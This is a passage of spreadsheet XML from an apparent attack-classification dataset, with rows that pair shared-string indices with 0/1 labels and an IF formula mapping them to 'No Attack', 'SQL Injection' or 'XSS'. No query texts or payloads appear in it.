      <c r="C19956" s="7" t="str">
        <f t="shared" si="311"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="19957" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A19957" s="1" t="s">
        <v>14624</v>
      </c>
      <c r="B19957">
        <v>1</v>
      </c>
      <c r="C19957" s="7" t="str">
        <f t="shared" si="311"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="19958" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A19958" s="1" t="s">
        <v>14359</v>
      </c>
      <c r="B19958">
        <v>1</v>
      </c>
      <c r="C19958" s="7" t="str">
        <f t="shared" si="311"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="19959" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A19959" s="1" t="s">
        <v>28359</v>
      </c>
      <c r="B19959">
        <v>0</v>
      </c>
      <c r="C19959" s="7" t="str">
        <f t="shared" si="311"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="19960" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A19960" s="1" t="s">
        <v>16122</v>
      </c>
      <c r="B19960">
        <v>1</v>
      </c>
      <c r="C19960" s="7" t="str">
        <f t="shared" si="311"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="19961" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A19961" s="1" t="s">
        <v>19174</v>
      </c>
      <c r="B19961">
        <v>1</v>
      </c>
      <c r="C19961" s="7" t="str">
        <f t="shared" si="311"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="19962" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A19962" s="1" t="s">
        <v>19135</v>
      </c>
      <c r="B19962">
        <v>1</v>
      </c>
      <c r="C19962" s="7" t="str">
        <f t="shared" si="311"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="19963" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A19963" s="1" t="s">
        <v>34352</v>
      </c>
      <c r="B19963">
        <v>0</v>
      </c>
      <c r="C19963" s="7" t="str">
        <f t="shared" si="311"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="19964" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A19964" s="1" t="s">
        <v>23413</v>
      </c>
      <c r="B19964">
        <v>0</v>
      </c>
      <c r="C19964" s="7" t="str">
        <f t="shared" si="311"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="19965" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A19965" s="1" t="s">
        <v>28905</v>
      </c>
      <c r="B19965">
        <v>0</v>
      </c>
      <c r="C19965" s="7" t="str">
        <f t="shared" si="311"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="19966" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A19966" s="1" t="s">
        <v>35266</v>
      </c>
      <c r="B19966">
        <v>0</v>
      </c>
      <c r="C19966" s="7" t="str">
        <f t="shared" si="311"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="19967" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A19967" s="1" t="s">
        <v>27838</v>
      </c>
      <c r="B19967">
        <v>0</v>
      </c>
      <c r="C19967" s="7" t="str">
        <f t="shared" si="311"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="19968" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A19968" s="1" t="s">
        <v>9481</v>
      </c>
      <c r="B19968">
        <v>0</v>
      </c>
      <c r="C19968" s="7" t="str">
        <f t="shared" si="311"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="19969" spans="1:3" ht="28.8" x14ac:dyDescent="0.3">
      <c r="A19969" s="1" t="s">
        <v>17202</v>
      </c>
      <c r="B19969">
        <v>1</v>
      </c>
      <c r="C19969" s="7" t="str">
        <f t="shared" si="311"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="19970" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A19970" s="1" t="s">
        <v>16702</v>
      </c>
      <c r="B19970">
        <v>1</v>
      </c>
      <c r="C19970" s="7" t="str">
        <f t="shared" si="311"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="19971" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A19971" s="1" t="s">
        <v>26537</v>
      </c>
      <c r="B19971">
        <v>1</v>
      </c>
      <c r="C19971" s="7" t="str">
        <f t="shared" ref="C19971:C20034" si="312">IF(B19971=0,"No Attack", IF(B19971=1, "SQL Injection", "XSS") )</f>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="19972" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A19972" s="1" t="s">
        <v>23511</v>
      </c>
      <c r="B19972">
        <v>0</v>
      </c>
      <c r="C19972" s="7" t="str">
        <f t="shared" si="312"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="19973" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A19973" s="1" t="s">
        <v>13012</v>
      </c>
      <c r="B19973">
        <v>1</v>
      </c>
      <c r="C19973" s="7" t="str">
        <f t="shared" si="312"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="19974" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A19974" s="1" t="s">
        <v>17314</v>
      </c>
      <c r="B19974">
        <v>1</v>
      </c>
      <c r="C19974" s="7" t="str">
        <f t="shared" si="312"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="19975" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A19975" s="1" t="s">
        <v>15498</v>
      </c>
      <c r="B19975">
        <v>1</v>
      </c>
      <c r="C19975" s="7" t="str">
        <f t="shared" si="312"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="19976" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A19976" s="1" t="s">
        <v>16913</v>
      </c>
      <c r="B19976">
        <v>1</v>
      </c>
      <c r="C19976" s="7" t="str">
        <f t="shared" si="312"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="19977" spans="1:3" ht="28.8" x14ac:dyDescent="0.3">
      <c r="A19977" s="1" t="s">
        <v>18066</v>
      </c>
      <c r="B19977">
        <v>1</v>
      </c>
      <c r="C19977" s="7" t="str">
        <f t="shared" si="312"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="19978" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A19978" s="1" t="s">
        <v>30143</v>
      </c>
      <c r="B19978">
        <v>0</v>
      </c>
      <c r="C19978" s="7" t="str">
        <f t="shared" si="312"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="19979" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A19979" s="1" t="s">
        <v>17520</v>
      </c>
      <c r="B19979">
        <v>1</v>
      </c>
      <c r="C19979" s="7" t="str">
        <f t="shared" si="312"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="19980" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A19980" s="1" t="s">
        <v>29905</v>
      </c>
      <c r="B19980">
        <v>0</v>
      </c>
      <c r="C19980" s="7" t="str">
        <f t="shared" si="312"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="19981" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A19981" s="1" t="s">
        <v>25509</v>
      </c>
      <c r="B19981">
        <v>1</v>
      </c>
      <c r="C19981" s="7" t="str">
        <f t="shared" si="312"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="19982" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A19982" s="1" t="s">
        <v>24716</v>
      </c>
      <c r="B19982">
        <v>1</v>
      </c>
      <c r="C19982" s="7" t="str">
        <f t="shared" si="312"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="19983" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A19983" s="1" t="s">
        <v>30010</v>
      </c>
      <c r="B19983">
        <v>0</v>
      </c>
      <c r="C19983" s="7" t="str">
        <f t="shared" si="312"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="19984" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A19984" s="1" t="s">
        <v>16569</v>
      </c>
      <c r="B19984">
        <v>1</v>
      </c>
      <c r="C19984" s="7" t="str">
        <f t="shared" si="312"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="19985" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A19985" s="1" t="s">
        <v>35518</v>
      </c>
      <c r="B19985">
        <v>0</v>
      </c>
      <c r="C19985" s="7" t="str">
        <f t="shared" si="312"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="19986" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A19986" s="1" t="s">
        <v>15455</v>
      </c>
      <c r="B19986">
        <v>1</v>
      </c>
      <c r="C19986" s="7" t="str">
        <f t="shared" si="312"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="19987" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A19987" s="1" t="s">
        <v>16160</v>
      </c>
      <c r="B19987">
        <v>1</v>
      </c>
      <c r="C19987" s="7" t="str">
        <f t="shared" si="312"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="19988" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A19988" s="1" t="s">
        <v>34476</v>
      </c>
      <c r="B19988">
        <v>0</v>
      </c>
      <c r="C19988" s="7" t="str">
        <f t="shared" si="312"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="19989" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A19989" s="1" t="s">
        <v>12320</v>
      </c>
      <c r="B19989">
        <v>1</v>
      </c>
      <c r="C19989" s="7" t="str">
        <f t="shared" si="312"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="19990" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A19990" s="1" t="s">
        <v>20128</v>
      </c>
      <c r="B19990">
        <v>0</v>
      </c>
      <c r="C19990" s="7" t="str">
        <f t="shared" si="312"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="19991" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A19991" s="1" t="s">
        <v>18559</v>
      </c>
      <c r="B19991">
        <v>1</v>
      </c>
      <c r="C19991" s="7" t="str">
        <f t="shared" si="312"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="19992" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A19992" s="1" t="s">
        <v>17698</v>
      </c>
      <c r="B19992">
        <v>1</v>
      </c>
      <c r="C19992" s="7" t="str">
        <f t="shared" si="312"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="19993" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A19993" s="1" t="s">
        <v>16637</v>
      </c>
      <c r="B19993">
        <v>1</v>
      </c>
      <c r="C19993" s="7" t="str">
        <f t="shared" si="312"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="19994" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A19994" s="1" t="s">
        <v>24869</v>
      </c>
      <c r="B19994">
        <v>1</v>
      </c>
      <c r="C19994" s="7" t="str">
        <f t="shared" si="312"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="19995" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A19995" s="1" t="s">
        <v>27275</v>
      </c>
      <c r="B19995">
        <v>0</v>
      </c>
      <c r="C19995" s="7" t="str">
        <f t="shared" si="312"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="19996" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A19996" s="1" t="s">
        <v>24348</v>
      </c>
      <c r="B19996">
        <v>0</v>
      </c>
      <c r="C19996" s="7" t="str">
        <f t="shared" si="312"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="19997" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A19997" s="1" t="s">
        <v>25815</v>
      </c>
      <c r="B19997">
        <v>1</v>
      </c>
      <c r="C19997" s="7" t="str">
        <f t="shared" si="312"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="19998" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A19998" s="1" t="s">
        <v>32474</v>
      </c>
      <c r="B19998">
        <v>0</v>
      </c>
      <c r="C19998" s="7" t="str">
        <f t="shared" si="312"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="19999" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A19999" s="1" t="s">
        <v>36467</v>
      </c>
      <c r="B19999">
        <v>0</v>
      </c>
      <c r="C19999" s="7" t="str">
        <f t="shared" si="312"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="20000" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A20000" s="1" t="s">
        <v>34761</v>
      </c>
      <c r="B20000">
        <v>0</v>
      </c>
      <c r="C20000" s="7" t="str">
        <f t="shared" si="312"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="20001" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A20001" s="1" t="s">
        <v>37066</v>
      </c>
      <c r="B20001">
        <v>0</v>
      </c>
      <c r="C20001" s="7" t="str">
        <f t="shared" si="312"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="20002" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A20002" s="1" t="s">
        <v>26478</v>
      </c>
      <c r="B20002">
        <v>1</v>
      </c>
      <c r="C20002" s="7" t="str">
        <f t="shared" si="312"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="20003" spans="1:3" ht="28.8" x14ac:dyDescent="0.3">
      <c r="A20003" s="1" t="s">
        <v>15563</v>
      </c>
      <c r="B20003">
        <v>1</v>
      </c>
      <c r="C20003" s="7" t="str">
        <f t="shared" si="312"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="20004" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A20004" s="1" t="s">
        <v>21873</v>
      </c>
      <c r="B20004">
        <v>0</v>
      </c>
      <c r="C20004" s="7" t="str">
        <f t="shared" si="312"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="20005" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A20005" s="1" t="s">
        <v>25254</v>
      </c>
      <c r="B20005">
        <v>1</v>
      </c>
      <c r="C20005" s="7" t="str">
        <f t="shared" si="312"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="20006" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A20006" s="1" t="s">
        <v>14479</v>
      </c>
      <c r="B20006">
        <v>1</v>
      </c>
      <c r="C20006" s="7" t="str">
        <f t="shared" si="312"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="20007" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A20007" s="1" t="s">
        <v>26559</v>
      </c>
      <c r="B20007">
        <v>1</v>
      </c>
      <c r="C20007" s="7" t="str">
        <f t="shared" si="312"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="20008" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A20008" s="1" t="s">
        <v>30032</v>
      </c>
      <c r="B20008">
        <v>0</v>
      </c>
      <c r="C20008" s="7" t="str">
        <f t="shared" si="312"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="20009" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A20009" s="1" t="s">
        <v>29217</v>
      </c>
      <c r="B20009">
        <v>0</v>
      </c>
      <c r="C20009" s="7" t="str">
        <f t="shared" si="312"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="20010" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A20010" s="1" t="s">
        <v>27776</v>
      </c>
      <c r="B20010">
        <v>0</v>
      </c>
      <c r="C20010" s="7" t="str">
        <f t="shared" si="312"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="20011" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A20011" s="1" t="s">
        <v>24980</v>
      </c>
      <c r="B20011">
        <v>1</v>
      </c>
      <c r="C20011" s="7" t="str">
        <f t="shared" si="312"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="20012" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A20012" s="1" t="s">
        <v>24703</v>
      </c>
      <c r="B20012">
        <v>1</v>
      </c>
      <c r="C20012" s="7" t="str">
        <f t="shared" si="312"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="20013" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A20013" s="1" t="s">
        <v>21064</v>
      </c>
      <c r="B20013">
        <v>0</v>
      </c>
      <c r="C20013" s="7" t="str">
        <f t="shared" si="312"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="20014" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A20014" s="1" t="s">
        <v>15345</v>
      </c>
      <c r="B20014">
        <v>1</v>
      </c>
      <c r="C20014" s="7" t="str">
        <f t="shared" si="312"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="20015" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A20015" s="1" t="s">
        <v>27142</v>
      </c>
      <c r="B20015">
        <v>0</v>
      </c>
      <c r="C20015" s="7" t="str">
        <f t="shared" si="312"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="20016" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A20016" s="1" t="s">
        <v>12142</v>
      </c>
      <c r="B20016">
        <v>1</v>
      </c>
      <c r="C20016" s="7" t="str">
        <f t="shared" si="312"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="20017" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A20017" s="1" t="s">
        <v>19666</v>
      </c>
      <c r="B20017">
        <v>1</v>
      </c>
      <c r="C20017" s="7" t="str">
        <f t="shared" si="312"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="20018" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A20018" s="1" t="s">
        <v>17232</v>
      </c>
      <c r="B20018">
        <v>1</v>
      </c>
      <c r="C20018" s="7" t="str">
        <f t="shared" si="312"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="20019" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A20019" s="1" t="s">
        <v>21878</v>
      </c>
      <c r="B20019">
        <v>0</v>
      </c>
      <c r="C20019" s="7" t="str">
        <f t="shared" si="312"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="20020" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A20020" s="1" t="s">
        <v>32594</v>
      </c>
      <c r="B20020">
        <v>0</v>
      </c>
      <c r="C20020" s="7" t="str">
        <f t="shared" si="312"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="20021" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A20021" s="1" t="s">
        <v>20423</v>
      </c>
      <c r="B20021">
        <v>0</v>
      </c>
      <c r="C20021" s="7" t="str">
        <f t="shared" si="312"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="20022" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A20022" s="1" t="s">
        <v>12571</v>
      </c>
      <c r="B20022">
        <v>1</v>
      </c>
      <c r="C20022" s="7" t="str">
        <f t="shared" si="312"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="20023" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A20023" s="1" t="s">
        <v>34307</v>
      </c>
      <c r="B20023">
        <v>0</v>
      </c>
      <c r="C20023" s="7" t="str">
        <f t="shared" si="312"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="20024" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A20024" s="1" t="s">
        <v>18921</v>
      </c>
      <c r="B20024">
        <v>1</v>
      </c>
      <c r="C20024" s="7" t="str">
        <f t="shared" si="312"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="20025" spans="1:3" ht="28.8" x14ac:dyDescent="0.3">
      <c r="A20025" s="1" t="s">
        <v>18379</v>
      </c>
      <c r="B20025">
        <v>1</v>
      </c>
      <c r="C20025" s="7" t="str">
        <f t="shared" si="312"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="20026" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A20026" s="1" t="s">
        <v>19554</v>
      </c>
      <c r="B20026">
        <v>1</v>
      </c>
      <c r="C20026" s="7" t="str">
        <f t="shared" si="312"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="20027" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A20027" s="1" t="s">
        <v>35120</v>
      </c>
      <c r="B20027">
        <v>0</v>
      </c>
      <c r="C20027" s="7" t="str">
        <f t="shared" si="312"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="20028" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A20028" s="1" t="s">
        <v>23344</v>
      </c>
      <c r="B20028">
        <v>0</v>
      </c>
      <c r="C20028" s="7" t="str">
        <f t="shared" si="312"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="20029" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A20029" s="1" t="s">
        <v>12938</v>
      </c>
      <c r="B20029">
        <v>1</v>
      </c>
      <c r="C20029" s="7" t="str">
        <f t="shared" si="312"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="20030" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A20030" s="1" t="s">
        <v>14540</v>
      </c>
      <c r="B20030">
        <v>1</v>
      </c>
      <c r="C20030" s="7" t="str">
        <f t="shared" si="312"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="20031" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A20031" s="1" t="s">
        <v>22792</v>
      </c>
      <c r="B20031">
        <v>0</v>
      </c>
      <c r="C20031" s="7" t="str">
        <f t="shared" si="312"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="20032" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A20032" s="1" t="s">
        <v>34010</v>
      </c>
      <c r="B20032">
        <v>0</v>
      </c>
      <c r="C20032" s="7" t="str">
        <f t="shared" si="312"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="20033" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A20033" s="1" t="s">
        <v>23580</v>
      </c>
      <c r="B20033">
        <v>0</v>
      </c>
      <c r="C20033" s="7" t="str">
        <f t="shared" si="312"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="20034" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A20034" s="1" t="s">
        <v>30321</v>
      </c>
      <c r="B20034">
        <v>0</v>
      </c>
      <c r="C20034" s="7" t="str">
        <f t="shared" si="312"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="20035" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A20035" s="1" t="s">
        <v>26168</v>
      </c>
      <c r="B20035">
        <v>1</v>
      </c>
      <c r="C20035" s="7" t="str">
        <f t="shared" ref="C20035:C20098" si="313">IF(B20035=0,"No Attack", IF(B20035=1, "SQL Injection", "XSS") )</f>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="20036" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A20036" s="1" t="s">
        <v>35975</v>
      </c>
      <c r="B20036">
        <v>0</v>
      </c>
      <c r="C20036" s="7" t="str">
        <f t="shared" si="313"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="20037" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A20037" s="1" t="s">
        <v>15814</v>
      </c>
      <c r="B20037">
        <v>1</v>
      </c>
      <c r="C20037" s="7" t="str">
        <f t="shared" si="313"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="20038" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A20038" s="1" t="s">
        <v>25862</v>
      </c>
      <c r="B20038">
        <v>1</v>
      </c>
      <c r="C20038" s="7" t="str">
        <f t="shared" si="313"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="20039" spans="1:3" ht="28.8" x14ac:dyDescent="0.3">
      <c r="A20039" s="1" t="s">
        <v>24670</v>
      </c>
      <c r="B20039">
        <v>1</v>
      </c>
      <c r="C20039" s="7" t="str">
        <f t="shared" si="313"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="20040" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A20040" s="1" t="s">
        <v>15446</v>
      </c>
      <c r="B20040">
        <v>1</v>
      </c>
      <c r="C20040" s="7" t="str">
        <f t="shared" si="313"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="20041" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A20041" s="1" t="s">
        <v>32267</v>
      </c>
      <c r="B20041">
        <v>0</v>
      </c>
      <c r="C20041" s="7" t="str">
        <f t="shared" si="313"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="20042" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A20042" s="1" t="s">
        <v>17990</v>
      </c>
      <c r="B20042">
        <v>1</v>
      </c>
      <c r="C20042" s="7" t="str">
        <f t="shared" si="313"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="20043" spans="1:3" ht="28.8" x14ac:dyDescent="0.3">
      <c r="A20043" s="1" t="s">
        <v>17877</v>
      </c>
      <c r="B20043">
        <v>1</v>
      </c>
      <c r="C20043" s="7" t="str">
        <f t="shared" si="313"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="20044" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A20044" s="1" t="s">
        <v>29423</v>
      </c>
      <c r="B20044">
        <v>0</v>
      </c>
      <c r="C20044" s="7" t="str">
        <f t="shared" si="313"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="20045" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A20045" s="1" t="s">
        <v>28065</v>
      </c>
      <c r="B20045">
        <v>0</v>
      </c>
      <c r="C20045" s="7" t="str">
        <f t="shared" si="313"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="20046" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A20046" s="1" t="s">
        <v>16939</v>
      </c>
      <c r="B20046">
        <v>1</v>
      </c>
      <c r="C20046" s="7" t="str">
        <f t="shared" si="313"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="20047" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A20047" s="1" t="s">
        <v>15351</v>
      </c>
      <c r="B20047">
        <v>1</v>
      </c>
      <c r="C20047" s="7" t="str">
        <f t="shared" si="313"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="20048" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A20048" s="1" t="s">
        <v>25139</v>
      </c>
      <c r="B20048">
        <v>1</v>
      </c>
      <c r="C20048" s="7" t="str">
        <f t="shared" si="313"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="20049" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A20049" s="1" t="s">
        <v>24762</v>
      </c>
      <c r="B20049">
        <v>1</v>
      </c>
      <c r="C20049" s="7" t="str">
        <f t="shared" si="313"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="20050" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A20050" s="1" t="s">
        <v>29183</v>
      </c>
      <c r="B20050">
        <v>0</v>
      </c>
      <c r="C20050" s="7" t="str">
        <f t="shared" si="313"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="20051" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A20051" s="1" t="s">
        <v>13586</v>
      </c>
      <c r="B20051">
        <v>1</v>
      </c>
      <c r="C20051" s="7" t="str">
        <f t="shared" si="313"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="20052" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A20052" s="1" t="s">
        <v>29220</v>
      </c>
      <c r="B20052">
        <v>0</v>
      </c>
      <c r="C20052" s="7" t="str">
        <f t="shared" si="313"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="20053" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A20053" s="1" t="s">
        <v>15712</v>
      </c>
      <c r="B20053">
        <v>1</v>
      </c>
      <c r="C20053" s="7" t="str">
        <f t="shared" si="313"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="20054" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A20054" s="1" t="s">
        <v>13994</v>
      </c>
      <c r="B20054">
        <v>1</v>
      </c>
      <c r="C20054" s="7" t="str">
        <f t="shared" si="313"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="20055" spans="1:3" ht="28.8" x14ac:dyDescent="0.3">
      <c r="A20055" s="1" t="s">
        <v>18411</v>
      </c>
      <c r="B20055">
        <v>1</v>
      </c>
      <c r="C20055" s="7" t="str">
        <f t="shared" si="313"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="20056" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A20056" s="1" t="s">
        <v>23896</v>
      </c>
      <c r="B20056">
        <v>0</v>
      </c>
      <c r="C20056" s="7" t="str">
        <f t="shared" si="313"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="20057" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A20057" s="1" t="s">
        <v>20174</v>
      </c>
      <c r="B20057">
        <v>0</v>
      </c>
      <c r="C20057" s="7" t="str">
        <f t="shared" si="313"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="20058" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A20058" s="1" t="s">
        <v>26648</v>
      </c>
      <c r="B20058">
        <v>1</v>
      </c>
      <c r="C20058" s="7" t="str">
        <f t="shared" si="313"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="20059" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A20059" s="1" t="s">
        <v>15388</v>
      </c>
      <c r="B20059">
        <v>1</v>
      </c>
